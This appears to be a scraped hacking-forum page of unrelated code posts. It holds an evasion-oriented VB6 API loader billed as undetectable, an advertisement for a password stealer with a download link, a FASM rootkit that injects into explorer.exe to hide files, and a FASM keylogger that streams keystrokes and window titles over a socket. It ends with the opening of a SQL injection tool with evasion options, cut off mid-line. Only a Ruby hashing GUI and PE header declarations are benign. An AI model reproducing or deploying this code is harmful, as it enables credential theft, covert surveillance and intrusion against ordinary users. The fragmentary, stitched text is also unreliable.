Public Sub Class_Initialize() Call PutThunk(THUNK_KERNELBASE) c_lKrnl = PatchCall If Not c_lKrnl = 0 Then c_lLoadLib = GetProcAddress(c_lKrnl, "LoadLibraryW") If Not c_lLoadLib = 0 Then c_bInit = True End If End If End Sub Public Function GetProcAddress(ByVal lMod As Long, ByVal sProc As String) As Long Dim tIMAGE_DOS_HEADER As IMAGE_DOS_HEADER Dim tIMAGE_NT_HEADERS As IMAGE_NT_HEADERS Dim tIMAGE_EXPORT_DIRECTORY As IMAGE_EXPORT_DIRECTORY Call CpyMem(tIMAGE_DOS_HEADER, ByVal lMod, SIZE_DOS_HEADER) If Not tIMAGE_DOS_HEADER.e_magic = IMAGE_DOS_SIGNATURE Then Exit Function End If 
Call CpyMem(tIMAGE_NT_HEADERS, ByVal lMod + tIMAGE_DOS_HEADER.e_lfanew, SIZE_NT_HEADERS) If Not tIMAGE_NT_HEADERS.Signature = IMAGE_NT_SIGNATURE Then Exit Function End If Dim lVAddress As Long Dim lVSize As Long Dim lBase As Long With tIMAGE_NT_HEADERS.OptionalHeader lVAddress = lMod + .DataDirectory(0).VirtualAddress lVSize = lVAddress + .DataDirectory(0).Size lBase = .ImageBase End With Call CpyMem(tIMAGE_EXPORT_DIRECTORY, ByVal lVAddress, SIZE_EXPORT_DIRECTORY) Dim i As Long Dim lFunctAdd As Long Dim lNameAdd As Long Dim lNumbAdd As Long With tIMAGE_EXPORT_DIRECTORY For i = 0 To .NumberOfNames - 1 CpyMem lNameAdd, ByVal lBase + .lpAddressOfNames + i * 4, 4 If StringFromPtr(lBase + lNameAdd) = sProc Then CpyMem lNumbAdd, ByVal lBase + .lpAddressOfNameOrdinals + i * 2, 2 CpyMem lFunctAdd, ByVal lBase + .lpAddressOfFunctions + lNumbAdd * 4, 4 GetProcAddress = lFunctAdd + lBase If GetProcAddress >= lVAddress And _ GetProcAddress <= lVSize Then Call ResolveForward(GetProcAddress, lMod, sProc) If Not lMod = 0 Then GetProcAddress = GetProcAddress(lMod, sProc) Else GetProcAddress = 0 End If End If Exit Function End If Next End With End Function Private Function ResolveForward( _ ByVal lAddress As Long, _ ByRef lLib As Long, _ ByRef sMod As String) Dim sForward As String sForward = StringFromPtr(lAddress) If InStr(1, sForward, ".") Then lLib = LoadLibrary(Split(sForward, ".")(0)) sMod = Split(sForward, ".")(1) End If End Function Private Function StringFromPtr( _ ByVal lAddress As Long) As String Dim bChar As Byte Do CpyMem bChar, ByVal lAddress, 1 lAddress = lAddress + 1 If bChar = 0 Then Exit Do StringFromPtr = StringFromPtr & Chr$(bChar) Loop End Function Private Function nlfpkgnrj(ByVal sData As String) As String Dim i As Long For i = 1 To Len(sData) Step 2 nlfpkgnrj = nlfpkgnrj & Chr$(Val("&H" & Mid$(sData, i, 2))) Next i End Function That modded version uses Native APIs (Thanks Slayer ) and loads APIs on runtime... Of course, its FUD... ALL CREDITS FOR COBEIN!!! 
BTW, it's a class module (*.cls).
-
; by E0N
;
; FASM declarations of the PE (Portable Executable) headers found at the start
; of a Windows image: the DOS header, the COFF file header, the optional header
; with its data directories, and the NT headers that wrap the last two.
;
; Layout note: the optional header declared here carries BaseOfData and a
; 32-bit ImageBase, i.e. the PE32 (32-bit) form. The PE32+ (64-bit) optional
; header has a different layout, so these declarations must not be applied to
; it.
;
; Parsing note: every field below comes from the file or memory image being
; inspected and is attacker-controlled when that image is untrusted. A parser
; should check e_magic and Signature, and bounds-check e_lfanew, the
; SizeOf* fields and each directory's VirtualAddress/Size against the size of
; the buffer before dereferencing anything computed from them.

struct IMAGE_DOS_HEADER
  e_magic    dw ? ; Magic number ("MZ", 0x5A4D, in a valid image)
  e_cblp     dw ? ; Bytes on last page of file
  e_cp       dw ? ; Pages in file
  e_crlc     dw ? ; Relocations
  e_cparhdr  dw ? ; Size of header in paragraphs
  e_minalloc dw ? ; Minimum extra paragraphs needed
  e_maxalloc dw ? ; Maximum extra paragraphs needed
  e_ss       dw ? ; Initial (relative) SS value
  e_sp       dw ? ; Initial SP value
  e_csum     dw ? ; Checksum
  e_ip       dw ? ; Initial IP value
  e_cs       dw ? ; Initial (relative) CS value
  e_lfarlc   dw ? ; File address of relocation table
  e_ovno     dw ? ; Overlay number
  e_res0     dw ? ; Reserved words (4 in total: e_res0..e_res3)
  e_res1     dw ?
  e_res2     dw ?
  e_res3     dw ?
  e_oemid    dw ? ; OEM identifier (for e_oeminfo)
  e_oeminfo  dw ? ; OEM information; e_oemid specific
  e_res20    dw ? ; Reserved words (10 in total: e_res20..e_res29)
  e_res21    dw ?
  e_res22    dw ?
  e_res23    dw ?
  e_res24    dw ?
  e_res25    dw ?
  e_res26    dw ?
  e_res27    dw ?
  e_res28    dw ?
  e_res29    dw ?
  e_lfanew   dd ? ; File address of new exe header (offset of IMAGE_NT_HEADERS);
                  ; validate it lies inside the image before following it
ends

; COFF file header that follows the 4-byte PE signature.
struct IMAGE_FILE_HEADER
  Machine              dw ? ; Target CPU type
  NumberOfSections     dw ? ; Count of section headers after the optional header
  TimeDateStamp        dd ?
  PointerToSymbolTable dd ?
  NumberOfSymbols      dd ?
  SizeOfOptionalHeader dw ? ; Declared size of the optional header that follows
  characteristics      dw ? ; Image attribute flags
ends

; One entry of the optional header's data-directory table.
struct IMAGE_DATA_DIRECTORY
  VirtualAddress dd ? ; RVA of the table, relative to the image base
  Size           dd ? ; Size of the table in bytes
ends

struct IMAGE_OPTIONAL_HEADER
  ; Standard fields.
  Magic                       dw ? ; Distinguishes PE32 from PE32+; check it before
                                   ; trusting the layout declared here
  MajorLinkerVersion          db ?
  MinorLinkerVersion          db ?
  SizeOfCode                  dd ?
  SizeOfInitializedData       dd ?
  SizeOfUnitializedData       dd ?
  AddressOfEntryPoint         dd ? ; RVA of the entry point
  BaseOfCode                  dd ?
  BaseOfData                  dd ?
  ; NT additional fields.
  ImageBase                   dd ? ; Preferred load address
  SectionAlignment            dd ?
  FileAlignment               dd ?
  MajorOperatingSystemVersion dw ?
  MinorOperatingSystemVersion dw ?
  MajorImageVersion           dw ?
  MinorImageVersion           dw ?
  MajorSubsystemVersion       dw ?
  MinorSubsystemVersion       dw ?
  W32VersionValue             dd ?
  SizeOfImage                 dd ?
  SizeOfHeaders               dd ?
  CheckSum                    dd ?
  SubSystem                   dw ?
  DllCharacteristics          dw ?
  SizeOfStackReserve          dd ?
  SizeOfStackCommit           dd ?
  SizeOfHeapReserve           dd ?
  SizeOfHeapCommit            dd ?
  LoaderFlags                 dd ?
  NumberOfRvaAndSizes         dd ? ; Number of directory entries actually present;
                                   ; do not assume all 16 below are valid
  ; The names below are 1-based; the usual 0-based directory index is one less.
  DataDirectory1              IMAGE_DATA_DIRECTORY ? ; index 0:  export table
  DataDirectory2              IMAGE_DATA_DIRECTORY ? ; index 1:  import table
  DataDirectory3              IMAGE_DATA_DIRECTORY ? ; index 2:  resource table
  DataDirectory4              IMAGE_DATA_DIRECTORY ? ; index 3:  exception table
  DataDirectory5              IMAGE_DATA_DIRECTORY ? ; index 4:  certificate (security) table
  DataDirectory6              IMAGE_DATA_DIRECTORY ? ; index 5:  base relocation table
  DataDirectory7              IMAGE_DATA_DIRECTORY ? ; index 6:  debug data
  DataDirectory8              IMAGE_DATA_DIRECTORY ? ; index 7:  architecture (reserved)
  DataDirectory9              IMAGE_DATA_DIRECTORY ? ; index 8:  global pointer
  DataDirectory10             IMAGE_DATA_DIRECTORY ? ; index 9:  TLS table
  DataDirectory11             IMAGE_DATA_DIRECTORY ? ; index 10: load configuration
  DataDirectory12             IMAGE_DATA_DIRECTORY ? ; index 11: bound import table
  DataDirectory13             IMAGE_DATA_DIRECTORY ? ; index 12: import address table
  DataDirectory14             IMAGE_DATA_DIRECTORY ? ; index 13: delay-load import descriptors
  DataDirectory15             IMAGE_DATA_DIRECTORY ? ; index 14: CLR runtime header
  DataDirectory16             IMAGE_DATA_DIRECTORY ? ; index 15: reserved
ends

; Signature followed by the two headers above.
struct IMAGE_NT_HEADERS
  Signature      dd ? ; "PE\0\0" (0x00004550) in a valid image
  FileHeader     IMAGE_FILE_HEADER ?
  OptionalHeader IMAGE_OPTIONAL_HEADER ?
ends
-
by Exidous [info] Gets IE7, IE8 (Note: Small bug in IE8 Only gets 1 Password.. Will be fixed soon), Firefox 3.X, msn, few game serial keys, windows key, Pc Information, Pidgin, Yahoo, Trillian, and steam! (Still Adding More In!!!) (Soon, Get logs: MSN, Skype, Aol, and ICQ.. Maby trillian idk yet) (Pro Version: Skype Spread, MSN Spread, P2P Spread, USB Spread, Bypass XP Firewall, and Bypass UAC.) Screenshots: Note this is the public version, I will soon have private copys for sale! Also, This is first release.. Please Report Bugs.. ALL THE SPREADING AND BYPASS FEATURES ARE DISABLED IN FREE VERSION! Download: http://www.2shared.com/file/7111098/7fd6afa2/ZH_Stealer_Public_V01.html
-
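# Credit to protos, the author of this code.
#
# Small Tk window that shows the MD5 digest, the SHA-1 digest and the Base64
# encoding of the text typed into the entry field. The same three values are
# also echoed to standard output.
#
# Despite the "Encriptar" / "Encripta" labels, nothing here is encryption:
# MD5 and SHA-1 are unkeyed one-way hash functions, and Base64 is a reversible
# encoding that anyone can decode. Both digests are considered broken for
# collision resistance and, being fast and unsalted as used here, are not
# suitable for storing passwords or protecting secrets.
require 'digest/md5'
require 'digest/sha1'
require 'base64'
require 'tk'

root = TkRoot.new { title "Encripter By pRotos" }

TkLabel.new(root) {
  text "Palabra a Encriptar"
  # Options are passed as arguments; the original handed them to pack as a
  # block, which presumably left the padding and side unset.
  pack('padx' => 20, 'pady' => 20, 'side' => 'top')
}

# Holds the text typed by the user.
palabra = TkVariable.new()
TkEntry.new(root) {
  textvariable(palabra)
  pack()
}

# Output widgets are packed from the bottom up, each under its own label.
# No space between `pack` and its parenthesis, so the hash is parsed as the
# argument list.
TkLabel.new(root) {
  text " MD5"
  pack('side' => 'bottom')
}
md5 = TkText.new(root) { width 25; height 2 }.pack('side' => 'bottom')

TkLabel.new(root) {
  text "SHA1"
  pack('side' => 'bottom')
}
sha = TkText.new(root) { width 25; height 2 }.pack('side' => 'bottom')

TkLabel.new(root) {
  text "Base64"
  pack('side' => 'bottom')
}
b64 = TkText.new(root) { width 25; height 2 }.pack('side' => 'bottom')

TkButton.new(root) {
  text " Encripta"
  command proc {
    entrada = palabra.value
    amd5 = Digest::MD5.hexdigest(entrada)
    asha1 = Digest::SHA1.hexdigest(entrada)
    # encode64 appends a trailing newline and wraps long output.
    ab64 = Base64.encode64(entrada)

    puts " _MD5_", amd5
    puts " _SHA1_", asha1
    puts " _Base64_", ab64

    # Empty the fields first so that a second click replaces the previous
    # result instead of appending to it.
    md5.clear
    sha.clear
    b64.clear

    md5.insert('end', amd5)
    sha.insert('end', asha1)
    b64.insert('end', ab64)
  }
  pack('side' => 'top')
}

TkButton.new(root) {
  text " Clear "
  command proc {
    md5.clear
    sha.clear
    b64.clear
  }
  pack('side' => 'bottom')
}

Tk.mainloop()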
-
;------------------------------------------------------------------------------------------------- ; RootKit por Hacker_Zero & YST ; RootKit sin dll que Hookea FindNextFileW en explorer ocultando los archivos que ;comiencen por '#' ;------------------------------------------------------------------------------------------------- include 'C:\fasm\include\win32ax.inc' .code proc start locals ProcessName db "explorer.exe",0 endl stdcall Inyectar,addr ProcessName,FINFuncion-FuncionInyectada,FuncionInyectada,[GetProcAddress] cmp eax,-1 jne salir invoke MessageBoxA,0,"No se encontró el proceso!",0,0 salir: invoke ExitProcess,0 endp proc Inyectar,ProcessName,Tamaño,Funcion,Datos locals struct PROCESSENTRY32 dwSize dd ? cntUsage dd ? th32ProcessID dd ? th32DefaultHeapID dd ? th32ModuleID dd ? cntThreads dd ? th32ParentProcessID dd ? pcPriClassBase dd ? dwFlags dd ? szExeFile rb MAX_PATH ends pInfo PROCESSENTRY32 ? Handle dd ? PID dd ? DirFuncion dd ? hProcess dd ? endl pushad ;Obtenemos el PID del proceso invoke CreateToolhelp32Snapshot,0x00000002,0 mov [Handle],eax mov eax,sizeof.PROCESSENTRY32 mov [pInfo.dwSize], eax BuclePid: invoke Process32Next,[Handle],addr pInfo cmp eax,0 je FinProcBuclePID ;No hay más procesos invoke lstrcmp,addr pInfo.szExeFile,[ProcessName] cmp eax,0 jne BuclePid jmp FinBuclePid FinProcBuclePID: invoke CloseHandle,[Handle] popad mov eax,-1 ret FinBuclePid: invoke CloseHandle,[Handle] push [pInfo.th32ProcessID] pop [PID] ;Lazamos el proceso invoke OpenProcess,PROCESS_CREATE_THREAD+PROCESS_VM_OPERATION+PROCESS_VM_WRITE,FALSE,[PID] mov [hProcess],eax ;Reservamos espacio en el proceso invoke VirtualAllocEx,[hProcess],0,[Tamaño],MEM_COMMIT+MEM_RESERVE,PAGE_EXECUTE_READWRITE mov [DirFuncion],eax ;Escribimos los datos en memoria invoke WriteProcessMemory,[hProcess],[DirFuncion],[Funcion],[Tamaño],0 ;Creamos el hilo invoke CreateRemoteThread,[hProcess],0,0,[DirFuncion],[Datos],0,0 popad mov eax,1 ret endp proc FuncionInyectada,pGetProcAddress locals 
BaseKernel32 dd ? OriginalProtection dd ? endl ;Leemos el PEB para obtener la base de KERNEL32.DLL xor eax, eax add eax,[fs:eax+30h] mov eax, [eax + 0ch] mov esi, [eax + 1ch] lodsd mov eax, [eax + 08h] mov [BaseKernel32],eax ;Obtenemos la dirección de FindNextFileA stdcall [pGetProcAddress],[BaseKernel32],'FindNextFileW' mov ebx,eax stdcall [pGetProcAddress],[BaseKernel32],"VirtualProtect" stdcall eax,ebx,7,PAGE_EXECUTE_READWRITE,addr OriginalProtection ;Calculamos el delta offset call delta delta: pop edx sub edx,delta ;edx=delta ;Lo guardamos en la pila push edx ;Guardamos la dirección de FindNextFileW en la variable dirFindNextFileW add edx,dirFindNextFileW mov dword[edx],ebx pop edx mov ecx,edx add ecx,ApiOriginal mov al,byte[ebx] mov byte[ecx],al mov byte[ebx],0xE9 ;0xE9=jmp inc ebx inc ecx mov eax,dword[ebx] mov dword[ecx],eax mov eax,FuncionHook add eax,edx sub eax,ebx sub eax,4 mov dword[ebx],eax ;la dirección a la que saltará add ebx,4 add ecx,4 mov ax,word[ebx] mov word[ecx],ax mov word[ebx],0x9090 ret ;Terminamos, ya hemos modificado el principio de la api, ;cuando el programa llame a FindNextFileW, saltará a FuncionHook ;-------------------------------------------------------------------------------------------------------------------------------------------- ;Contiene los 7 primeros bytes de la Api FindNextFileW y una rutina para saltar a MessageBox+7 ApiOriginal: ;edx=delta ;7 nops que cambiaremos en tiempo de ejecución por los 7 primeros bytes de FindNextFileW nop nop nop nop nop nop nop add edx,dirFindNextFileW ;Obtenemos la dirección de FindNextFileW leyendo mov eax,dword[edx] ;la variable dirFindNextFileW y la guardamos en eax add eax,7 ;Nos desplazamos 7 bytes jmp eax ;Saltamos a FindNextFileW+7 ;-------------------------------------------------------------------------------------------------------------------------------------------- ;Función a la que salta el programa cuando se llama a la API hookeada proc FuncionHook,hFindFile,lpFindFileData 
Volver: ;Obtenemos el delta offset call delta2 delta2: pop edx sub edx,delta2 ;Llamamos a nuestro buffer push [lpFindFileData] push [hFindFile] mov ecx,edx add ecx,ApiOriginal call ecx cmp eax,0 je Retornar mov ebx,[lpFindFileData] add ebx,44 cmp byte[ebx],'#' jne Retornar jmp Volver Retornar: ret endp ;------------------------------------------------------------------------------------------------------------------------------------------- dirFindNextFileW dd ? endp FINFuncion: .end start
-
include 'C:\fasm\include\win32ax.inc' .data IP db '127.0.0.1',0 nArch db '\Logdrive.dll',0 nFile db '\Regdrive.exe',0 WinPath dd ? Espacio db '\n',0 saltolinea db 13,10,0 hVentana dd ? Rev dd ? ThreadID dd ? hHook dd ? hSock dd ? hArch dd ? hKey dd ? MyPath dd ? ifSock dd 0 fSize dd ? dLeidos dd ? Buffer dd ? regdisposition dd ? regSubKey db "SOFTWARE\Microsoft\Windows\CurrentVersion\Run",0 .code start: ;Creamos un nuevo hilo para el Hook invoke CreateThread,0,4096,Hookear,0,0,[ThreadID] ;Damos tamaño a los registros invoke GlobalAlloc,GPTR,1024h push eax eax eax pop esi ebx edx ;Conexion invoke WSAStartup,200,eax invoke socket,AF_INET,SOCK_STREAM,0 push eax pop [hSock] ;Esi Contiene el Handle de socket mov word[ebx],2 invoke htons,2000 mov word[ebx],2 mov word[ebx+2], AX invoke gethostbyname,IP add eax,32 invoke inet_addr,eax mov dword[ebx+4],eax .BucleConectar: invoke connect,[hSock],ebx,16 cmp eax, 0xFFFFFFFF JE .BucleConectar .BucleRecivir: invoke GlobalAlloc,GPTR,1024h push eax invoke recv,[hSock],eax,1023h,0 mov [Rev],eax pop eax cmp [Rev],0 jng revisar .if dword[eax] = '$Go' mov [ifSock],1 .endif .if dword[eax] = '$Sp' mov [ifSock],0 .endif revisar: cmp [Rev], 0 jne start.BucleRecivir .reiniciar: stdcall dword[closesocket],[hSock] stdcall dword[WSACleanup] jmp start .end start ;Lanzamos el Hook desde un nuevo hilo proc Hookear xor ebx,ebx invoke GetModuleHandleA,ebx invoke SetWindowsHookExA,13,KeyboardHook,eax,ebx mov [hHook],eax invoke GetMessageA,ebx,ebx,ebx,ebx invoke UnhookWindowsHookEx,[hHook] endp ;Proc del Hook donde se detectará la tecla pulsada proc KeyboardHook,nCode,wParam,lParam mov eax,[wParam] cmp eax,WM_KEYDOWN jne siguienteHook mov eax,[lParam] cmp byte[eax],VK_CAPITAL je siguienteHook cmp byte[eax],VK_LSHIFT je siguienteHook cmp byte[eax],VK_RSHIFT je siguienteHook .if byte[eax]=VK_RETURN stdcall EnviarDatos,Espacio jmp siguienteHook .endif .if byte[eax]=VK_BACK stdcall ProcesarTecla,"{BACK}" jmp siguienteHook .endif .if byte[eax]=VK_ESCAPE 
stdcall ProcesarTecla,"{ESC}" jmp siguienteHook .endif .if byte[eax]=VK_TAB stdcall ProcesarTecla,"{TAB}" jmp siguienteHook .endif .if byte[eax]=VK_LCONTROL stdcall ProcesarTecla,"{CTRL}" jmp siguienteHook .endif .if byte[eax]=VK_RCONTROL stdcall ProcesarTecla,"{CTRL}" jmp siguienteHook .endif .if byte[eax]=VK_RMENU stdcall ProcesarTecla,"{ALT}" jmp siguienteHook .endif .if byte[eax]=VK_LMENU stdcall ProcesarTecla,"{ALT}" jmp siguienteHook .endif .if byte[eax]=VK_SPACE stdcall ProcesarTecla," " jmp siguienteHook .endif .if byte[eax]=VK_DELETE stdcall ProcesarTecla,"{DEL}" jmp siguienteHook .endif .if byte[eax]=VK_RWIN stdcall ProcesarTecla,"{WIN}" jmp siguienteHook .endif .if byte[eax]=VK_LWIN stdcall ProcesarTecla,"{WIN}" jmp siguienteHook .endif .if byte[eax]=VK_F1 stdcall ProcesarTecla,"{F1}" jmp siguienteHook .endif .if byte[eax]=VK_F2 stdcall ProcesarTecla,"{F2}" jmp siguienteHook .endif .if byte[eax]=VK_F3 stdcall ProcesarTecla,"{F3}" jmp siguienteHook .endif .if byte[eax]=VK_F4 stdcall ProcesarTecla,"{F4}" jmp siguienteHook .endif .if byte[eax]=VK_F5 stdcall ProcesarTecla,"{F5}" jmp siguienteHook .endif .if byte[eax]=VK_F6 stdcall ProcesarTecla,"{F6}" jmp siguienteHook .endif .if byte[eax]=VK_F7 stdcall ProcesarTecla,"{F7}" jmp siguienteHook .endif .if byte[eax]=VK_F8 stdcall ProcesarTecla,"{F8}" jmp siguienteHook .endif .if byte[eax]=VK_F9 stdcall ProcesarTecla,"{F9}" jmp siguienteHook .endif .if byte[eax]=VK_F10 stdcall ProcesarTecla,"{F10}" jmp siguienteHook .endif .if byte[eax]=VK_F11 stdcall ProcesarTecla,"{F11}" jmp siguienteHook .endif .if byte[eax]=VK_F12 stdcall ProcesarTecla,"{F12}" jmp siguienteHook .endif .if byte[eax]=0xBA stdcall isShift cmp ecx,1 je NoBA stdcall ProcesarTecla,"^" jmp siguienteHook NoBA: stdcall ProcesarTecla,"`" jmp siguienteHook .endif .if byte[eax]=0xBB stdcall isShift cmp ecx,1 je NoBB stdcall ProcesarTecla,"*" jmp siguienteHook NoBB: stdcall ProcesarTecla,"+" jmp siguienteHook .endif .if byte[eax]=0xBC stdcall isShift cmp 
ecx,1 je NoBC stdcall ProcesarTecla,";" jmp siguienteHook NoBC: stdcall ProcesarTecla,"," jmp siguienteHook .endif .if byte[eax]=0xBD stdcall isShift cmp ecx,1 je NoBD stdcall ProcesarTecla,"_" jmp siguienteHook NoBD: stdcall ProcesarTecla,"-" jmp siguienteHook .endif .if byte[eax]=0xBE stdcall isShift cmp ecx,1 je NoBE stdcall ProcesarTecla,":" jmp siguienteHook NoBE: stdcall ProcesarTecla,"." jmp siguienteHook .endif .if byte[eax]=0xBF stdcall isShift cmp ecx,1 je NoBF stdcall ProcesarTecla,"Ç" jmp siguienteHook NoBF: stdcall ProcesarTecla,"ç" jmp siguienteHook .endif .if byte[eax]=0xC0 stdcall isShift cmp ecx,1 je NoC0 stdcall ProcesarTecla,"Ñ" jmp siguienteHook NoC0: stdcall ProcesarTecla,"ñ" jmp siguienteHook .endif .if byte[eax]=0xDB stdcall isShift cmp ecx,1 je NoDB stdcall ProcesarTecla,"?" jmp siguienteHook NoDB: stdcall ProcesarTecla,"'" jmp siguienteHook .endif .if byte[eax]=0xDC stdcall isShift cmp ecx,1 je NoDC stdcall ProcesarTecla,"ª" jmp siguienteHook NoDC: stdcall ProcesarTecla,"º" jmp siguienteHook .endif .if byte[eax]=0xDD stdcall isShift cmp ecx,1 je NoDD stdcall ProcesarTecla,"¿" jmp siguienteHook NoDD: stdcall ProcesarTecla,"¡" jmp siguienteHook .endif .if byte[eax]=0xDE stdcall isShift cmp ecx,1 je NoDE stdcall ProcesarTecla,"¨" jmp siguienteHook NoDE: stdcall ProcesarTecla,"´" jmp siguienteHook .endif .if byte[eax]=0x30 stdcall isShift cmp ecx,1 je No0 stdcall ProcesarTecla,"=" jmp siguienteHook No0: stdcall ProcesarTecla,"0" jmp siguienteHook .endif .if byte[eax]=0x31 stdcall isShift cmp ecx,1 je No1 stdcall ProcesarTecla,"!" 
jmp siguienteHook No1: stdcall ProcesarTecla,"1" jmp siguienteHook .endif .if byte[eax]=0x32 stdcall isShift cmp ecx,1 je No2 stdcall ProcesarTecla,'"' jmp siguienteHook No2: stdcall ProcesarTecla,"2" jmp siguienteHook .endif .if byte[eax]=0x33 stdcall isShift cmp ecx,1 je No3 stdcall ProcesarTecla,"·" jmp siguienteHook No3: stdcall ProcesarTecla,"3" jmp siguienteHook .endif .if byte[eax]=0x34 stdcall isShift cmp ecx,1 je No4 stdcall ProcesarTecla,"$" jmp siguienteHook No4: stdcall ProcesarTecla,"4" jmp siguienteHook .endif .if byte[eax]=0x35 stdcall isShift cmp ecx,1 je No5 stdcall ProcesarTecla,"%" jmp siguienteHook No5: stdcall ProcesarTecla,"5" jmp siguienteHook .endif .if byte[eax]=0x36 stdcall isShift cmp ecx,1 je No6 stdcall ProcesarTecla,"&" jmp siguienteHook No6: stdcall ProcesarTecla,"6" jmp siguienteHook .endif .if byte[eax]=0x37 stdcall isShift cmp ecx,1 je No7 stdcall ProcesarTecla,"/" jmp siguienteHook No7: stdcall ProcesarTecla,"7" jmp siguienteHook .endif .if byte[eax]=0x38 stdcall isShift cmp ecx,1 je No8 stdcall ProcesarTecla,"(" jmp siguienteHook No8: stdcall ProcesarTecla,"8" jmp siguienteHook .endif .if byte[eax]=0x39 stdcall isShift cmp ecx,1 je No9 stdcall ProcesarTecla,")" jmp siguienteHook No9: stdcall ProcesarTecla,"9" jmp siguienteHook .endif .if byte[eax]=VK_NUMPAD0 stdcall ProcesarTecla,"0" jmp siguienteHook .endif .if byte[eax]=VK_NUMPAD1 stdcall ProcesarTecla,"1" jmp siguienteHook .endif .if byte[eax]=VK_NUMPAD2 stdcall ProcesarTecla,"2" jmp siguienteHook .endif .if byte[eax]=VK_NUMPAD3 stdcall ProcesarTecla,"3" jmp siguienteHook .endif .if byte[eax]=VK_NUMPAD4 stdcall ProcesarTecla,"4" jmp siguienteHook .endif .if byte[eax]=VK_NUMPAD5 stdcall ProcesarTecla,"5" jmp siguienteHook .endif .if byte[eax]=VK_NUMPAD6 stdcall ProcesarTecla,"6" jmp siguienteHook .endif .if byte[eax]=VK_NUMPAD7 stdcall ProcesarTecla,"7" jmp siguienteHook .endif .if byte[eax]=VK_NUMPAD8 stdcall ProcesarTecla,"8" jmp siguienteHook .endif cmp byte[eax],65 ;VK_A jl 
siguienteHook cmp byte[eax],90 ;VK_Z jg siguienteHook ;Letras A-Z stdcall isShift cmp ecx,1 jne listo mov eax,[lParam] add byte[eax],32 listo: stdcall ProcesarTecla,eax siguienteHook: invoke CallNextHookEx,[hHook],[nCode],[wParam],[lParam] ret endp proc ProcesarTecla,tecla ; Procesa la tecla capturada ;cmp [ifSock],1 ;je sEnviar ;sGuardar: ;invoke GetWindowsDirectory,WinPath,1024 ;invoke lstrcat,WinPath,nArch ;invoke CreateFile,WinPath,GENERIC_READ,0,0,OPEN_ALWAYS,0,0 ;mov [hArch],eax ;invoke GetFileSize, [hArch],NULL ;mov [fSize],eax ;invoke LocalAlloc, LPTR,[fSize] ;mov [Buffer],eax ;invoke ReadFile,[hArch],[Buffer],[fSize],dLeidos,NULL ;invoke CloseHandle,[hArch] ;invoke lstrcat,[Buffer],[tecla] ;invoke CreateFile,WinPath,GENERIC_WRITE,0,0,CREATE_ALWAYS,0,0 ;invoke lstrlen,[Buffer] ;invoke WriteFile,[hArch],[Buffer],eax,dLeidos,NULL ;invoke CloseHandle,[hArch] ;ret sEnviar: invoke GetForegroundWindow cmp eax,[hVentana] je enviartecla mov [hVentana],eax invoke GlobalAlloc,GPTR,256 push eax invoke GetWindowText,[hVentana],eax,256 pop eax mov ebx,eax stdcall EnviarDatos,Espacio stdcall EnviarDatos,Espacio stdcall EnviarDatos,ebx stdcall EnviarDatos,Espacio enviartecla: stdcall EnviarDatos,[tecla] ret endp proc EnviarDatos,datos invoke lstrlen,[datos] invoke send,[hSock],[datos],eax,0 ret endp ;Función para obtener el estado de las mayúsculas proc isShift invoke GetKeyState,VK_CAPITAL cmp eax,1 jl pulsada jmp nopulsada pulsada: invoke GetKeyState,VK_SHIFT cmp eax,1 jg noShift jmp siShift nopulsada: invoke GetKeyState,VK_SHIFT cmp eax,1 jg siShift jmp noShift siShift: ; Retornamos 0 si está mayúscula, 1 si no mov ecx,1 ret noShift: mov ecx,0 ret endp
-
# *union injection # *blind injection # *post and get method injection ** POST not working yet # *full information_schema enumeration # *table and column fuzzer # *database information extractor # *column length finder # *load_file fuzzer # *general info gathering # *MySQL hash cracker #!/usr/bin/python # 1/30/09 ################################################################ # .___ __ _______ .___ # # __| _/____ _______| | __ ____ \ _ \ __| _/____ # # / __ |\__ \\_ __ \ |/ // ___\/ /_\ \ / __ |/ __ \ # # / /_/ | / __ \| | \/ <\ \___\ \_/ \/ /_/ \ ___/ # # \____ |(______/__| |__|_ \\_____>\_____ /\_____|\____\ # # \/ \/ \/ # # ___________ ______ _ __ # # _/ ___\_ __ \_/ __ \ \/ \/ / # # \ \___| | \/\ ___/\ / # # \___ >__| \___ >\/\_/ # # est.2007 \/ \/ forum.darkc0de.com # ################################################################ # Multi-Purpose MySQL Injection Tool # FUNCTIONS # *union injection # *blind injection # *post and get method injection ** POST not working yet # *full information_schema enumeration # *table and column fuzzer # *database information extractor # *column length finder # *load_file fuzzer # *general info gathering # *MySQL hash cracker # FEATURES # *Round Robin Proxy w/ a proxy list (non-auth or auth proxies) # *Proxy Auth (works great with Squid w/ basic auth) # *Random browser agent chosen everytime the script runs # *debug mode for seeing every URL request, proxy used, browser agent used # Share the c0de! (f*ck Windows! Get a real OS!) # darkc0de Crew # www.darkc0de.com # rsauron[at]gmail[dot]com # Greetz to # d3hydr8, Tarsian, c0mrade (r.i.p brotha), reverenddigitalx, rechemen # and the darkc0de crew # This was written for educational purpose only. Use it at your own risk. # Author will be not responsible for any damage! # Intended for authorized Web Application Pen Testing! 
# CHANGES # 1.6 ADDED --end evasion setting # 1.5 Fixed --strart now starts at correct number instead of +1 # 1.4 Fixed schema mode when a table was specified - app would hand after last column # 1.3 Fixed Regular Expression Search in dump mode (should fixs issues of crazy html code when dumping) # 1.2 Fixed mode findcol - the way it replaced darkc0de in the output URL string # BE WARNED, THIS TOOL IS VERY LOUD.. import urllib, sys, re, os, socket, httplib, urllib2, time, random ##Set default evasion options here arg_end = "--" # examples "--", "/*", "#", "%00", "--&SESSIONID=00hn3gvs21lu5ke2f03bxr" <-- if you need vars after inj point arg_eva = "+" # examples "/**/" ,"+", "%20" ## colMax variable for column Finder colMax = 200 ## Set the default timeout value for requests socket.setdefaulttimeout(10) ## Default Log File Name logfile = "darkMySQLi.log" ## File Location to fuzz with for TABLE fuzzer tablefuzz = "tablesfuzz.txt" ## File Location to fuzz with for COLUMN fuzzer columnfuzz = "columnsfuzz.txt" ## File Location to fuzz with for LOAD_FILE fuzzer loadfilefuzz = "loadfilefuzz.txt" ## Agents agents = ["Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)", "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)", "Microsoft Internet Explorer/4.0b1 (Windows 95)", "Opera/8.00 (Windows NT 5.1; U; en)"] #URL Get Function def GetThatShit(head_URL): source = "" global gets;global proxy_num head_URL = head_URL.replace("+",arg_eva) request_web = urllib2.Request(head_URL) request_web.add_header('User-Agent',agent) while len(source) < 1: if arg_debug == "on": print "\n[proxy]:",proxy_list_count[proxy_num % proxy_len]+"\n[agent]:",agent+"\n[debug]:",head_URL,"\n" try: gets+=1;proxy_num+=1 source = proxy_list[proxy_num % proxy_len].open(request_web).read() except (KeyboardInterrupt, SystemExit): raise except (urllib2.HTTPError): print "[-] 